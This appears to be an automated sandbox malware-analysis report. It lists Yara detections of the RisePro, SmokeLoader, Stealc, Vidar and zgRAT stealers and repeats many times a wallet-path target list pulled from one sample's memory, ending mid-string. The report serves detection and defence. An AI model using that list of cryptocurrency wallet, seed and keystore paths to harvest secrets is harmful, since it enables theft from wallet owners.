Source: Yara match	File source: 00000009.00000002.2040474083.0000000005188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2255116493.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2195916450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2040474083.0000000004E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cTThtD77H613MBNsXAevJo07.exe PID: 7616, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 0000000F.00000002.2622383626.0000000004770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2393333451.0000000004877000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\2FN_tSqExD_WAZJi52lCzdU.zip, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000012.00000002.2162296306.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2169331111.0000000002A31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2876108133.00000000011D1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000000C.00000002.2507993198.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D5ft_dAZwUuL52qmUM1rPffT.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c67dc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c971f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fq9BbqPKEgDrDHrc1Aru5zuA.exe.3a15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c971f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.fSJI2dwukNtWVEjIwlXBl7N4.exe.3c67dc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fq9BbqPKEgDrDHrc1Aru5zuA.exe.3a15570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.2173995104.0000000005890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2045291964.0000000003C97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2038976319.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2895958085.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1853189806.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2045291964.0000000003C38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2334904925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2381027828.0000000000F17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2290949834.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fq9BbqPKEgDrDHrc1Aru5zuA.exe PID: 7632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D5ft_dAZwUuL52qmUM1rPffT.exe PID: 7664, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: *electrum.Servers
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia 